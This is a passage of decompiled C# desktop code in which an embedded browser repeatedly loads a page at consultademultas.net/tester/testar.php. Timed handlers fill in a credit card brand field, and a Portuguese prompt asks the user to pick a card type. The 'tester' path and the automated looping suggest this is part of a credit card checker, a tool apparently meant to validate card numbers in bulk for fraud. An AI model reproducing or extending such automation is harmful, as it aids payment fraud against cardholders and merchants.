        this.Timer3.Stop();

      }

      this.Timer3.Stop();

    }



    private void Timer4_Tick(object sender, EventArgs e)

    {

      this.WebBrowser1.Document.GetElementById("codigoBandeira").SetAttribute("value", Conversions.ToString(this.ComboBox1.SelectedItem));

      this.Timer1.Start();

      this.txtVerifica.Text = "";

      this.txtCX2.Text = "";

      this.Timer4.Stop();

    }



    private void Button1_Click_1(object sender, EventArgs e)

    {

      this.WebBrowser1.Navigate("http://consultademultas.net/tester/testar.php");

      this.Timer1.Stop();

      this.Timer2.Stop();

      this.Timer3.Stop();

      this.Timer4.Stop();

    }



    private void btnParou_Click(object sender, EventArgs e)

    {

      this.WebBrowser1.Navigate("http://consultademultas.net/tester/testar.php");

      this.Timer1.Stop();

      this.Timer2.Stop();

      this.Timer3.Stop();

      this.Timer4.Start();

    }



    private void Button4_Click(object sender, EventArgs e)

    {

      if (Microsoft.VisualBasic.CompilerServices.Operators.ConditionalCompareObjectEqual(this.ComboBox1.SelectedItem, (object) "", false))

      {

        int num = (int) Interaction.MsgBox((object) "Selecione o tipo de cartão de crédito!", MsgBoxStyle.Critical, (object) "Erro");

      }

      else

      {

        this.WebBrowser1.Document.GetElementById("codigoBandeira").SetAttribute("value", Conversions.ToString(this.ComboBox1.SelectedItem));

        this.Timer1.Start();

        this.ComboBox1.Enabled = false;

      }

    }



  }

}


